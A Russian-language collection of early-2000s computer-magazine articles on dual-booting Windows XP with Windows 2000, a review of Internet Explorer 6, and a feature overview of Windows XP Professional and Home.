Второй вопрос связан с рекомендацией Microsoft о размещении каждой из загружаемых операционных систем на отдельном разделе. Если установить несколько операционных систем на одном разделе, могут возникнуть конфликты при работе с некоторыми файлами и каталогами, такими, как Program Files и Documents and Settings. Если при создании систем с мультизагрузкой для предыдущих версий операционных систем можно было не следовать рекомендации «одна система на одном разделе», то при конфигурировании системы, включающей Windows XP, ее учитывать необходимо. Конечно, потенциальные проблемы всегда одни и те же. Но в случае с Windows XP придется иметь дело с бета-версией или с только что выпущенной версией программного продукта. Поэтому, во-первых, при возникновении каких-либо трудностей нельзя будет рассчитывать на помощь Microsoft, а во-вторых, опасность возникновения конфликтов и потери данных будет существенно выше.

Если на компьютере установлена операционная система Windows 2000 Professional, и под нее выделено все (или почти все) дисковое пространство, то для установки Windows XP придется либо добавить новые диски, либо переразметить существующие. При работе с динамическими дисками менять размер томов и создавать новые тома достаточно просто. Но для обычных дисков выполнить переразметку разделов не так легко, и лучше для этого использовать программное обеспечение независимого поставщика. Моя любимая программа для разметки дисков — PartitionMagic 6.0 компании Power Quest. Она работает быстро и надежно, поддерживает разделы FAT12, FAT16, FAT32, HPFS, NTFS 4.0, NTFS 5.0 (NTFS5), Linux ext2 и Linux swap.

Есть еще одно важное правило, актуальное для систем с мультизагрузкой Windows XP, Windows 2000 и Windows NT: имена компьютеров для установленных операционных систем не должны совпадать (т. е. при каждой новой установке операционной системы имя компьютера должно отличаться от всех предыдущих). Для каждой из установленных на машине систем в домене создается отдельная учетная запись, которой соответствует свой идентификатор SID, поэтому имена, присваиваемые этим учетным записям, должны быть уникальны.

Если этим правилом пренебречь, последствия могут быть самые неожиданные, от конфликтов при регистрации на серверах WINS или DNS до всевозможных проблем с доступом к ресурсам. Кроме того, в данном случае опять-таки нельзя будет рассчитывать на помощь Microsoft.

Если используется система шифрования файлов Encrypting File System (EFS) и доступ к зашифрованным файлам необходимо обеспечить как из Windows XP Professional, так и из Windows 2000 Professional, обе эти операционные системы должны состоять в одном домене. Кроме того, при регистрации в любой из двух операционных систем необходимо использовать перемещаемый профиль (roaming profile). Это нужно для того, чтобы вся информация, необходимая для доступа к зашифрованным данным, была в распоряжении каждой из операционных систем. Другой способ обеспечения доступа предполагает экспорт сертификатов пользователей для шифрования файлов и личных ключей из одной системы в другую.

После того как все подготовительные работы будут завершены, инсталляцию системы с мультизагрузкой рекомендуется производить так, чтобы самую новую операционную систему устанавливать последней. Более новые версии Windows лучше распознают предыдущие версии и легко встраиваются в существующую конфигурацию. Кроме того, подобный порядок установки операционных систем позволяет избежать ситуации, когда при добавлении более старой системы на компьютер, где уже установлена более новая операционная система, перезаписывается загрузочный сектор более новой системы. Поэтому, если нужно установить Windows XP Professional и Windows 2000 Professional, вначале следует поставить Windows 2000 Pro, а затем Windows XP Pro. Большинству пользователей такой порядок установки покажется вполне естественным. Однако те, кому придется строить новую систему или переустанавливать существующие, не должны забывать об этой рекомендации.

Итак, планируя установку на одном компьютере Windows XP Professional и Windows 2000 Professional, необходимо определить, целесообразно ли использовать динамические диски, нужно ли изменять структуру существующих дисков или добавлять новые дисковые накопители для XP Professional. Ответив на эти вопросы и придумав разные имена компьютера для каждой из версий Windows, можно вставлять в дисковод компакт-диск с файлами установки Windows XP Professional и начинать знакомиться с новой версией Windows 2000.

 

 

ЗНАКОМЬТЕСЬ: MICROSOFT INTERNET EXPLORER

26 октября сего года, безо всякой помпы и рекламной шумихи, тихо и, можно сказать, по домашнему, вышла в свет новая версия одного из самых популярных, и в то же время самых скандальных продуктов Microsoft - броузер Internet Explorer 6.0 (я имею в виду то количество судебных процессов, сопровождающих весь период его существования, да и просто шквал нелицеприятных заявлений о нем с момента появления первых версий броузера в около- и компьютерной прессе). В этом обзоре я попытаюсь кратко рассказать о некоторых, наиболее заметных особенностях новой версии, а также об ее отличиях от широко распространенных IE 5.0 и 5.5 (которые, впрочем, являются близнецами - братьями).

Как и все последние продукты от Microsoft (Office XP, Windows Media Player 8 и т.д.), броузер Internet Explorer 6 выполнен с использованием ряда элементов ключевых технологий, разрабатываемых в рамках перспективной сетевой архитектуры DotNet, и уже частично применяемых в новейшей операционной системе Windows XP. Броузер сможет также работать и на всех остальных 32-битовых версиях Windows, за исключением Windows 95, поддержка которой сворачивается компанией Microsoft исключительно по маркетинговым соображениям. По задумкам стратегов из Редмонда, это будет еще одним дополнительным стимулом к смене операционной системы теми несознательными пользователями, которые слишком увлеклись использованием этой устаревшей ОС. Возвращаясь непосредственно к новому броузеру, хочу сразу отметить, что никаких сенсационных откровений его новая версия, являясь логичным преемником пятого поколения броузеров от Microsoft, не принесла. Отличия носят, по большей части, косметический характер, связанные с использованием элементов нового оформления графического интерфейса Windows XP, в которую броузер интегрирован, хотя и появилась поддержка целого ряда новых сетевых технологий. Впрочем, это и неудивительно: несмотря на то, что в последние годы Всемирная сеть обогатилась рядом новых интересных и полезных сервисов, в первую очередь связанных с передачей мультимедийной информации, подавляющая масса пользователей интернета достаточно консервативна и остается приверженцами традиционных сетевых услуг - протоколов HTTP (cо всеми его расширениями и дополнениями), FTP, электронной почте и общению с использованием Интернет-пейджеров. По этой причине все, что можно ожидать от Internet Explorer 6,- это дальнейшее повышение удобства пользования этими сервисами, а также скорости их выполнения.

Из основных нововведений, прежде всего, хочется отметить улучшенную поддержку имеющихся и включение ряда новых сетевых технологий. Так, Internet Explorer 6 обеспечивает полную поддержку технологии создания динамически изменяющегося пользовательского интерфейса DHTML, стандарта CSS 1 (Cascading Style Sheets), определяющего использование стилей при оформлении Web-страницы, а также стандарта на информационное наполнение страницы DOM 1 (Document Object Model), позволяющего осуществлять динамический доступ и обновление содержимого, структуры и стиля документов без каких-либо ограничений с точки зрения применяемых языков и платформ. Кроме того, появилась поддержка даже находящегося еще в стадии разработки нового языка SMIL (Synchronized Multimedia Integration Language) 2.0, предназначенного для создания с помощью фильтров различных эффектов для текста и графических изображений, причем, все эффекты выполняются в реальном времени и не требуют использования сценариев. Можно отметить и новую политику Microsoft в отношении защиты персональной информации о пользователе. Internet Explorer 6 теперь поддерживает стандарт P3P (Platform for Privacy Preferences), описывающий параметры сбора и обработки файлов cookies, в которых могут храниться как персональные сведения о пользователе, так и настройки, выбранные им в ходе посещения конкретного Web-узла. Проблема состоит в том, что на сайте, затребовавшем Вашу персональную информацию, обычно присутствует достаточное количество интегрированных в него сторонних элементов: это и счетчики посещений, баннерные рекламные системы и т.п., которые тем самым также получают доступ к информации из cookie. Возможно, для большинства пользователей это не имеет особого значения, однако далеко не все из нас готовы хоть в какой-то мере уподобляться персонажам скандальной программы "За стеклом". Использование же стандарта P3P теперь предоставляет возможность пользователю самостоятельно определять, какой объем персональной информации о себе он готов выставить на всеобщее обозрение в Сети. Каждый сайт, который следует стандарту P3P, должен в XML-файле предоставить свою контактную информацию, описать, какие данные и зачем он собирает и какой методики придерживается при сборе cookies. Считывая этот файл, броузер определит, насколько сайт соответствует стандартам P3P. Естественно, все это больше является заделом на будущее, так как на сегодняшний день количество ресурсов, в той или иной степени поддерживающих эти спецификации, пока еще очень ограничено.

 

Непосредственно в броузере пользователь может очень легко установить режим обработки cookies, используя для этого специальный ползунок в закладке Privacy. Всего доступны 6 его положений: в наиболее защищенном режиме блокируются все cookies, в наименее защищенном - разрешен полный доступ как для записи, так и для и считывания. Наряду с интегрированным в Windows ХР простейшим firewall-ом, такая система может обеспечить уровень защиты от деструктивных сетевых воздействий, вполне удовлетворяющий запросам не самых требовательных пользователей.

Microsoft усилила взаимодействие между Internet Explorer и Windows Media Player, что выразилось в появлении новой дополнительной панели инструментов Media Bar. Пользователи теперь смогут искать и проигрывать мультимедийные файлы (в форматах Windows Media Audio или Video) через Media Bar, расположенную, подобно существующим панелям, в левой части рабочего окна броузера.

 

Что касается работы с графическими изображениями, то вызывает определенный интерес еще одна новая функция, называющаяся Autoresize. Теперь большие изображения автоматически масштабируются так, чтобы поместиться в текущем окне броузера. В нижнем правом углу при этом появляется кнопка масштабирования, нажав на которую, можно менять режимы отображения картинки: уменьшенное изображение или же в натуральную величину. В предыдущих версиях Internet Explorer можно было достаточно легко сохранять понравившиеся картинки, найденные на просторах Сети - стоило лишь нажать на правую кнопку мышки и выбрать "Save Picture As…", но плавающая панелька, появившаяся в шестой версии броузера позволяет сделать это еще проще.

Если поместить указатель мыши над достаточно крупной картинкой на сайте, то автоматически появится панель инструментов Image Bar. Один щелчок - и изображение можно сохранить на жесткий диск, распечатать на принтере или отправить по электронной почте. Здесь же легко получить доступ к папке "Мои рисунки".

 

Хотя компания Microsoft и заявила, что в новой версии Internet Explorer-а исправлены все ошибки предыдущих версий, и он отличается в лучшую сторону от своих предшественников в плане стабильности и скорости в работе, тем не менее, в Сети уже появились первые "заплатки", исправляющие свежеобнаруженные в новинке ошибки. Без сомнения, будут они выявляться и в дальнейшем, ведь никогда не существовали в природе программные продукты от Microsoft, не требующие постоянных "патчей" и исправлений. Для разрешения таких ситуаций программисты Microsoft сделали пусть и небольшой, но, все-таки, шаг вперед по сравнению с предыдущими версиями программы: теперь вместо привычного сообщения "Приложение выполнило недопустимую операцию и будет закрыто" появляется диалоговое окно с предложением выслать разработчикам автоматически сгенерированный системой отчет об ошибке. По результатам анализа неисправности в службе технической поддержки Microsoft, пользователю может быть предложено автоматически скачать необходимые исправления или обновления для программы, если они, конечно, существуют в природе. А теперь пару слов о замеченных недостатках в новой версии. Internet Explorer 6 поддерживает виртуальную машину Java, однако JVM не входит в стандартную инсталляцию. Этот модуль будет установлен на Ваш компьютер отдельно, причем только в случае загрузки Web-страницы, использующей Java-апплеты. Кроме того, многолетнее противостояние двух основных соперников в войне броузеров привело к тому, что теперь Internet Explorer больше не поддерживает модули Plug-in Netscape. И последнее. Очень жаль, что в настройках нового броузера так и не появилась возможность ручного выбора программ, вызываемых броузером при просмотре и редактировании различных документов. Мне, например, совсем не по вкусу использовать встроенный в систему Notepad для первичного редактирования HTML-документов. Поэтому, как и в прошлых версиях, для обеспечения быстрого вызова более удобных и симпатичных редакторов Dreamweaver и Aditor, приходиться долго и нудно редактировать Системный Реестр Windows вручную.

Подводя итоги обзора нового продукта Microsoft, хочется выставить ему оценку, основываясь не только на достаточно широких потенциальных возможностях рассматриваемого броузера, но и привести свои собственные, признаю, достаточно субъективные, суждения. Дело в том, что подавляющее большинство его новых "фич" лично мною просто-напросто никогда не будут востребованы. Так, например, зачем мне, как и большинству моих соотечественников, "сидящих" на медленном и ненадежном модемном соединении, все эти Media Bar-ы? Смотреть потоковое видео или слушать сетевое радио? Не смешите. Поддержка практически всех новых технологий просмотра текста и графики тоже "не стреляют". Дело в том, что все они используются в основном только для создания все более навороченных рекламных баннеров и другой шелухи подобного рода, которая безжалостно вырезается установленными у меня баннерорезками. То же можно сказать и про cookies - уже давно, не веря в добрые намерения сетевого сообщества, сижу я за огненной стеной firewall-а, и с "кукисами" он прекрасно разбирается сам. Так что из всех нововведений остаются только большие и красочные кнопки на панелях броузера, а вот стоят ли они того, что бы менять "шило на мыло", решать вам самим, дорогие читатели.

 

 

 

 

Обследуем Windows XP

Новое поколение настольных систем

С выходом октябрьской версии Windows XP компания Microsoft вывела Windows на следующий виток эволюции операционных систем. XP призвана заменить не только Windows 2000 и Windows NT, но и системы Windows Me и Windows 9x. Как и Windows 2000, система XP базируется на 32-разрядном ядре NT. Но, в отличие от своей предшественницы, XP позиционируется как для корпоративного, так и для домашнего использования. XP зародилась в тот момент, когда Microsoft разделила направления разработки операционных систем на клиентское (XP) и серверное семейство .NET Server, ранее известное под названием Whistler. Чтобы определиться, стоит ли на роль базовой корпоративной настольной системы выбирать XP, нужно иметь представление о функциональных возможностях новой операционной системы.

Microsoft выпустила три новые версии XP: XP Home Edition, XP Professional и XP 64-Bit Edition. XP Home, предназначенная для домашнего применения и малого бизнеса, по сути является модификацией Windows 9x. Операционная система XP Professional предназначена для пользователей Windows 2000 Professional или NT Workstation 4.0. Хотя XP Home и XP Pro базируются на одном и том же системном ядре, ориентированная на применение в сфере бизнеса, XP Pro обладает расширенной функциональностью по сравнению с XP Home. На Рисунке 1 перечислены возможности XP Pro, отсутствующие в XP Home. Обе операционные системы можно заказать через специализированные магазины или получить предустановленными при покупке компьютера. 64-разрядную версию XP можно приобрести с компьютером на базе процессора Intel Itanium от доверенного производителя: например, Hewlett-Packard (HP), Dell, IBM или Compaq.

Системные требования и поддержка новых устройств

Неудивительно, что требования к системам XP Home и XP Pro и Windows 2000 Professional очень похожи. В Таблице 1 приведен список минимальных и рекомендуемых системных параметров. По сложившейся в Microsoft традиции — особенно это касается RAM — требования явно занижены. Поэтому, как и при работе с Windows 2000, для достижения приемлемого уровня производительности XP необходим значительно больший объем памяти. Я протестировал XP Pro на системах с процессорами 450 MГц и 1,2 ГГц с одинаковым объемом памяти 128 Mбайт, и в обоих случаях производительность впечатляла. Как правило, производительность настольной системы под управлением Windows 2000 при переходе на XP остается примерно на том же уровне.

Как и следовало ожидать, XP поддерживает аппаратные средства, имеющиеся на рынке на момент выпуска системы: например, высокопроизводительные жесткие диски с интерфейсом ATA100, шину IEEE 1394 (FireWire), устройства CD-R и CD-RW. В XP предусмотрена возможность записи компакт-дисков на устройствах CD-R и CD-RW, так что специальные программы от независимых производителей не понадобятся. Для записи на компакт-диск нужно просто выбрать в Windows Explorer интересующие файлы и перетащить их мышью на значок устройства CD-R , CD-RW или DVD-RAM. Дополнительно разработчики Microsoft встроили в новую операционную систему возможность создания компакт-диска с помощью программ Windows Media Player (WMP) и NT Backup. Для DVD-RAM добавлена поддержка файловой системы FAT32. Однако для самых последних моделей DVD-RW в базовой поставке поддержка не предусмотрена.

Установка или обновление?

Те пользователи, у которых на домашнем компьютере уже установлена система Windows Me или Windows 98, скорее всего, предпочтут модернизировать текущую версию до XP Home. Корпоративные пользователи с Windows 2000 Professional и NT Workstation 4.0 с помощью процедуры обновления смогут перейти на XP Pro. Но если используется Windows 95 или более ранняя версия Windows, обновление невозможно. Придется устанавливать систему заново. На Рисунке 2 изображены возможные способы перехода на Windows XP.

Рисунок 2. Пути перехода к XP.

Собственно процесс установки XP, как и Windows 2000, достаточно прост. Если машина работает в сети, в процессе инсталляции нужно будет указать имя компьютера, имя рабочей группы или домена, а также адрес TCP/IP, если в сети нет сервера DHCP. По умолчанию при установке XP в домене функция Fast User Switching отключается (эта функция позволяет нескольким пользователям работать на одной машине). После установки в домене и перезагрузки система выводит на экран обновленную версию диалогового окна Windows Logon. От начала до конца установка системы вручную занимает около 30 мин. Как и в случае с Windows 2000 Professional, можно воспользоваться технологией Remote Installation Services (RIS) для инсталляции систем с удаленного сервера в автоматическом режиме. В некоторых случаях, как будет описано ниже, после установки может потребоваться активация продукта (дополнительная информация об этом приведена во врезке «Процедура активации Windows Product Activation»).

После обновления Windows 2000 до уровня XP ранее открытые для общего доступа каталоги становятся недоступны. Чтобы этого не произошло, нужно запустить Network Setup Wizard и проинформировать систему о намерении в дальнейшем использовать совместный доступ к файлам. Впрочем, выделить каталоги в общий доступ всегда можно заново. Разработчики Microsoft объяснили, что эта особенность программы обновления реализована из соображений безопасности.

Пользовательский интерфейс XP

Для новой операционной системы в Microsoft разработан пользовательский интерфейс (неофициальное название — Luna), позволяющий новичкам без труда выполнять наиболее общие задачи. Однако опытных пользователей Windows 2000 или NT 4.0 новый интерфейс, вероятно, может раздражать. Местоположение ряда привычных объектов (например, Administrative Tools и значка My Computer) изменилось. Кроме того, новый интерфейс по сравнению со своими предшественниками для выполнения тех же задач требует больше манипуляций с мышью и перемещений по различным экранам. Тем не менее «картинка», в общем-то, изменилась мало. Пользователи, работавшие в Windows 2000, Windows Me и Windows 98, должны быстро привыкнуть к новому интерфейсу. Он более лаконичен: по умолчанию на рабочем столе отображается только один значок — Recycle Bin. Графические значки стали больше по размеру, меню Start переработано, а фоном по умолчанию служит подложка в мягких голубых тонах (меню Start представлено на Экране 1).

Экран 1. Меню Start системы XP.

В новом меню Start две позиции вверху слева зафиксированы для Web-браузера и программы электронной почты клиента, принятой по умолчанию. При желании можно использовать любой Web-браузер и любую программу электронной почты, а не только Microsoft Internet Explorer (IE) и Microsoft Outlook Express. Часто используемые программы автоматически появляются в меню Start внизу слева. Значки WMP, MSN Explorer, Windows Movie Maker и Tour Windows XP по умолчанию отображаются, но их всегда можно удалить. Для установленных программ используется подменю All Programs. Элементы, расположенные в правой части меню Start, выполняют те же задачи, что и меню Start в Windows 2000. А Control Panel наконец-то вынесена на верхний уровень меню Start.

Экран 2. Панель управления системы XP.

В отличие от панели управления Windows 2000, где программы, связанные с обслуживанием системы, перечислены по отдельности, панель управления XP (см. Экран 2) отображает ссылки на категории системных функций. Щелчок по ссылке — и появляется более детализированный список задач. Например, если выбрана категория Network and Internet Connections, XP выведет на экран диалоговое окно, содержащее некоторый список задач, доступных для выполнения, среди которых Set up or change your Internet connection, Create a connection to the network at your workplace, а также Set up or change your home or small office network. Выбрав любую из них, пользователь тем самым запускает программу Network Setup Wizard, которая будет руководить процессом выполнения задачи. Названное диалоговое окно также содержит значки Internet Options и Network Connections. Следует выбрать один из них для вывода окна, в котором настраиваются свойства указанного объекта. Если же пользователь предпочитает стиль интерфейса Windows 2000, достаточно переключиться на режим Switch to Classic View.

В XP реализован ряд усовершенствований в области интерфейса пользователя: переработана панель задач (taskbar) и в настройку панели добавлен параметр Group similar taskbar buttons. С помощью этого параметра можно сгруппировать схожие между собой объекты. Если данный параметр указан, XP группирует множество экземпляров одного приложения под одним значком. На самой панели задач выводятся стрелочки и многоточия, которые помогают следить за процессом группировки объектов. По щелчку на значке панели задач система выводит меню, в котором показаны все экземпляры открытого приложения. Следуя концепции минимализма, мастер Desktop Cleanup Wizard автоматически удаляет с рабочего стола все значки, обращение к которым происходит нерегулярно. Следующее усовершенствование — функция Web-Views, использующая список задач в стиле Dynamic HTML (DHTML) с привязкой к текущему каталогу для создания контекстно-зависимого списка задач. Например, когда с помощью Windows Explorer открывается каталог, в окошке WebView выводятся доступные пользователю задачи, связанные с управлением каталогами, такие, как Create a new folder и Share a folder. Когда Windows Explorer работает с файлами, в окошке WebView выводятся задачи, относящиеся к манипуляциям с файлами, — Copy a file и Delete a file.

Управление и совместимость

XP Pro предоставляет те же средства управления системой, что и Windows 2000, включая политики Group Policy, перемещаемые профили Roaming Profiles, установку с помощью RIS и IntelliMirror. Однако разработчики XP усовершенствовали многие функции. Так, Group Policy в XP позволяют настраивать параметры регистрации в сети (Netlogon). К примеру, пользователь может задействовать Group Policy для конфигурирования настроек клиента DNS и перенаправления содержимого My Documents в свой домашний каталог. Усовершенствования в Roaming Profiles включают возможности настройки взаимодействия с автономными offline-каталогами, наложения запрета копирования на сервер перемещаемого профиля при каждом его изменении, а также запрета использования такого профиля на тех или иных компьютерах. Служба RIS в реализации XP позволяет удаленно устанавливать Windows 2000 и .NET Server наряду с XP Pro.

В XP Pro появилась новая функция управления — автоматическое обновление Automatic Updates. С ее помощью администраторы системы могут автоматически загружать и устанавливать важнейшие обновления (например, пакеты исправлений Service Pack), а также модули коррекции системы безопасности и обновления для драйверов устройств. Загрузка обновлений осуществляется в фоновом режиме, после чего система предлагает установить обновления. Включение и выключение этой функции выполняется на вкладке Automatic Updates (см. Экран 3) в меню Start, Control Panel, Performance and Maintenance, System.

Экран 3. Закладка автоматического обновления.

Следующая новая функция управления XP, автоматическое восстановление Automated System Recovery (ASR), обеспечивает надежную защиту от ошибок типа Unexpected System Failure. Компонент резервирования ASR сохраняет состояние системы, служб и дисков. Кроме того, создается файл, содержащий резервную информацию, конфигурацию дисков, а также инструкции по процедуре восстановления для конкретного случая. Компонент восстановления ASR в дальнейшем будет использовать данные из названного файла для восстановления ранее сохраненного состояния системы.

XP Pro поддерживает функцию отказа от использования драйвера Device Driver Roll Back, которая позволяет заменить неисправный драйвер устройства ранее установленной версией. Чтобы воспользоваться функцией Device Driver Roll Back, следует открыть Device Manager, щелкнуть на значке неисправного устройства и выбрать Properties из контекстного меню. Затем нужно выбрать вкладку Driver и щелкнуть Roll Back Driver, чтобы вернуться к первоначальному драйверу устройства. Всякий раз, когда устанавливается неподписанный драйвер (unsigned device driver), XP автоматически создает Restore Point, своеобразную точку возврата, которая используется для восстановления системы.

XP Pro имеет ряд важных функций, которые были разработаны в помощь администраторам IT-подразделений. Во-первых, это большое количество новых утилит командной строки (см. Таблицу 2), взятых в основном из Microsoft Windows 2000 Resource Kit. Во-вторых, XP Pro способна работать с файлами журналов, размер которых превышает 1 Гбайт, а журналы событий теперь могут содержать встроенные ссылки URL на различные Web-сайты, где можно получить дополнительную информацию. В-третьих, система NTFS в XP поддерживает тома в режиме только чтения read-only, что позволяет облегчить системное резервирование.

Специалисты Microsoft изначально ставили перед собой задачу создать единую платформу для перехода как с Windows 2000, так и с Windows 9x. А это значит, что XP должна быть совместима с DOS и приложениями Windows 9x. Чтобы достичь лучшей совместимости с 16-разрядным DOS, разработчики подкорректировали виртуальную машину Virtual DOS Machine (VDM). В результате XP может работать с такими программами DOS, с которыми Windows 2000 или NT работать не могли, а под управлением Windows Me или Windows 98 для этого требовался особый режим DOS (режим работы Windows 9x, при котором программы DOS запускались в однозадачном режиме). Новая виртуальная машина XP более эффективно эмулирует управление памятью Windows 9x, и это позволило решить немало проблем, с которыми пользователи сталкивались при работе с 16-разрядным программным обеспечением под управлением 32-разрядного ядра NT. Разработчики Microsoft также добавили в машину DOS VDM системы XP звуковую поддержку Creative Technology Sound Blaster 2.0 для старых игр и приложений DOS.

Коммуникационные возможности

Наиболее значительные изменения, затрагивающие сетевой компонент XP, внесены в службу Windows Messenger, которая теперь заменяет приложения MSN Messenger (быстрый обмен сообщениями) и Net-Meeting (организация видеоконференций). Служба Windows Messenger обеспечивает возможность обмена сообщениями, проведения видео- и аудиоконференций, а также поддержку совместной работы (эта функция относится к службе Remote Assistance, о которой вкратце будет рассказано). Усовершенствованная технология передачи аудио- и видеоинформации позволяет с помощью Windows Messenger обеспечить проведение конференций по модему и по обычным линиям DSL (Digital Subscriber Line, цифровая абонентская линия).

В отличие от NetMeeting, служба Windows Messenger базируется на протоколе Session Initiation Protocol (SIP), упрощенном коммуникационном протоколе реального времени, который использует для организации вызовов электронные адреса участников (к сожалению, алгоритмы работы с протоколом SIP у Windows Messenger и NetMeeting несовместимы между собой). Новая функция подавления эха (acoustic-echo-canceling) позволяет участникам Windows Messenger использовать стандартный PC-микрофон (вместо головного телефона) для проведения качественной аудиоконференции. Для повышения качества связи по DSL и широкополосным соединениям разработчики встроили в Windows Messenger поддержку 16-килобитного аудиокодека SIREN от Sonic Foundry. Кроме того, Windows Messenger поддерживает сессии с системами MSN Messenger. К сожалению, служба Windows Messenger несовместима со службой AOL Instant Messenger.

Для того чтобы воспользоваться Windows Messenger через Internet, сначала необходимо получить учетную запись в службе Microsoft Passport. Microsoft Passport — бесплатная служ-ба, выполняющая аутентификацию пользователя и инициализацию вызова. Корпоративные пользователи могут в качестве сервера аутентификации задействовать Microsoft Exchange 2000 Conferencing Server. Кроме того, готовящийся к выпуску продукт .NET Server позволяет осуществлять поддержку Windows Messenger. На Экране 4 представлен пример сессии видеоконференции с использованием Windows Messenger.

Экран 4. Работа с Windows Messеnger.

Внедрение коммуникационных программ класса SOHO в XP предоставляет пользователям системы возможность совместной работы с соединениями Internet Connection Sharing (ICS), по аналогии с одноименной службой Windows 2000, и персональный брандмауэр Internet Connection Firewall (ICF). ICS позволяет задействовать XP в роли Internet-шлюза для других систем

локальной сети. ICS в XP обеспечивает базовые службы DHCP, DNS и Network Ad-dress Translation (NAT) для сетевых клиентов. При этом система с ICS не должна быть постоянно подключена к Internet: систе-мы клиентов можно сконфигурировать по принципу dial on demand (предоставление канала по требованию) — ICS-шлюз будет автоматически подключаться к Internet по мере необходимости.

Функция ICF динамически открывает и закрывает коммуникационные порты, используемые в сетевых программах. ICS поддерживает таблицы соединений, инициируемые локальными системами, и входящий Internet-трафик может достигнуть локального адресата только в случае наличия в ICF-таблице соответствующей записи — это означает, что процесс обмена информацией был начат именно из данной локальной сети. Хотя шлюз ICF в XP по многообразию возможностей уступает специализированным продуктам класса firewall, тем не менее на рынке SOHO и пользователей модемов служба ICF занимает очень важную нишу. XP Pro автоматически запускает службу ICF всякий раз, когда устанавливается ICS-соединение.

Одна из наиболее полезных новых коммуникационных функций XP — утилита Network Diagnostics, программа для диагностики и устранения системных и сетевых проблем. Network Diagnostics позволяет узнать текущий статус Internet-служб (почты, новостей), получить сведения о компьютере (системное имя, тип загрузки, объем RAM), информацию об операционной системе (номер сборки, дату установки, номер версии), а также проверить статус модемов и сетевых адаптеров. Чтобы запустить Network Diagnostics, нужно выбрать пункт Scan your system (Start, Control Panel, Network and Internet Connections, Network Diagnostics). На Экране 5 показаны результаты подобного сканирования.

Экран 5. Проверка сетевых настроек.

При тестировании сетевых адаптеров Network Diagnostics проверяет статус драйверов сетевых адаптеров и опрашивает шлюз, настроенный по умолчанию, основной и вторичный DNS-серверы, а также локальный IP-адрес. Утилита выводит отметки Passed или Failed для каждого проверяемого сетевого компонента и предоставляет другую полезную информацию о сети, в том числе IP-адреса шлюза, сервера DNS и сканируемого компьютера. Результаты работы Network Diagnostics могут быть сохранены в файле, который при необходимости можно переслать по электронной почте или FTP в службу поддержки.

Усовершенствованы также коммуникационные возможности XP в области беспроводной связи. XP позволяет выполнять сканирование на наличие беспроводной сети и автоматически настраивать сетевые карты стандарта 802.11 для подключения к ней. Эта функция полезна для мобильных пользователей при подключении к общедоступным ресурсам. XP поддерживает стандарт IEEE 802.1X для выполнения аутентификации при сетевом доступе.

Система поддержки и справочная служба

В том, что касается поддержки пользователя, XP демонстрирует исключительные возможности. Во-первых, в системе переработана справочная служба (Help). Поисковые возможности новой Help интегрированы с Web, поэтому поиск не ограничивается рамками локального компьютера, но затрагивает и базу данных Microsoft Knowledge Base. Дополнительно можно настроить связь с конференциями новостей Microsoft и новой секцией Did you know?, в которой Microsoft или OEM-партнер поддерживает ссылки на всевозможные Web-сайты. Каждый раз при обращении в Help and Support Center система связывается с Web-сайтом и обновляет заголовки в секции Did you know?. На Экране 6 показано основное окно Help and Support Center.

Экран 6. Система поддержки системы XP.

Хотя возможности поддержки пользователей усовершенствованы по сравнению с предыдущими версиями Windows, единообразие в работе аналогичных служб Microsoft — TechNet, Microsoft Developer Network (MSDN) или MSDN Web site — отсутствует. Программа Help не запоминает предыдущие запросы, результаты запросов выводятся по-разному. В одном случае система может показать результаты запроса в отдельном окне, в другом — во всплывающем окне, в третьем — как обновление содержимого окна Help and Support Center. В процессе тестирования по мере перемещения по ссылкам Help-системы я зачастую терял исходную индексную запись или список поиска.

Однако при тестировании наиболее интересных служб системы поддержки XP Pro — Remote Desktop и Remote Assistance — у меня никаких замечаний не было. Работа обеих служб основана на технологии Windows 2000 Server Terminal Services. Remote Desktop позволяет управлять целевой XP-системой с удаленной машины. Это чрезвычайно удобно, например, при подключении к офисной системе со своего домашнего компьютера. Эта же технология дает возможность большему числу пользователей в удаленном режиме регистрироваться и совместно использовать ресурсы одной системы. Но перед тем, как XP разрешит установить удаленное соединение, необходимо самостоятельно активизировать поддержку службы Remote Desktop. Для этого нужно выставить флажок Enable Remote Desktop (Start, Control Panel, Performance and Maintenance, System, Remote). Затем указанному числу пользователей предоставляется разрешение работать со службой Remote Desktop. Чтобы с управляющей станции обратиться к целевой системе, нужно выбрать пункт Remote Desktop Connection (Start, All Programs, Accessories, Communications).

Хотя два пользователя с разными идентификаторами (User ID) могут одновременно установить удаленное соединение с целевым компьютером, один и тот же пользователь и локально, и удаленно в одно и то же время зарегистрироваться на целевом компьютере не сможет. После того как соединение установлено, рабочий стол Remote Desktop появляется в окне Terminal Services на управляющей системе, а целевая система блокирует возможность локальной работы. Но если локальный пользователь нажимает Ctrl+Alt+Del, то удаленная сессия будет завершена. Производительность клиентских компьютеров при проведении тестирования по LAN-соединениям оказалась весьма высокой.

Служба Remote Assistance начинает работать там, где не работает Remote Desktop; она позволяет другим пользователям в удаленном режиме просматривать экран или брать на себя управление в случае возникновения проблем. Подобная возможность полезна для персонала службы поддержки (Help Desk). Как и Remote Desktop, Remote Assistance использует протокол RDP службы Terminal Services для отображения удаленного экрана. Для запуска Remote Assistance следует воспользоваться или Windows Messenger, или электронной почтой, чтобы обратить на себя внимание обслуживающего персонала. При использовании Windows Messenger проверяется список доступных в данный момент технических специалистов. После того как сообщение с просьбой о помощи отправлено, специалист на своем рабочем месте получает соответствующий запрос. На Экране 7 показан рабочий стол удаленного пользователя внутри окна Remote Assistance.

Экран 7. Доступ к удаленной системе с помощью Remote Desktop.

Специалист службы технической поддержки может либо пассивно наблюдать за происходящим на экране, либо взять управление на себя. В последнем случае инициатор обращения получает запрос на передачу функций управления в удаленном режиме. После того как пользователь ответит ОК, специалист получает возможность в удаленном режиме управлять системой пользователя. Чтобы завершить удаленную сессию, пользователю достаточно нажать Esc. Remote Assistance поддерживает передачу голосовых данных, благодаря чему пользователь моментально получает обратную связь, не поднимая телефонной трубки. Кроме того, с помощью Remote Assistance можно посылать файлы: например, при передаче для анализа отчета программы сетевой диагностики.

Примите верное решение

Для пользователей Windows Me и Windows 9x переход на XP Home или XP Pro позволит обеспечить более высокий уровень стабильности и функциональности системы. Пользователи NT в свою очередь получат преимущества при использовании нового интерфейса и системных утилит, а также смогут добиться более высокого уровня совместимости работающих приложений и сокращения времени загрузки.

Для пользователей Windows 2000 вопрос с переходом на XP решить сложнее: Windows 2000 имеет со-поставимую с XP стабильность и производительность. Однако для тех, кто заинтересован в возможности работы в удаленном режиме, организации конференций Windows Messenger, а также для мобильных пользователей переход на XP имеет свои неоспоримые преимущества.

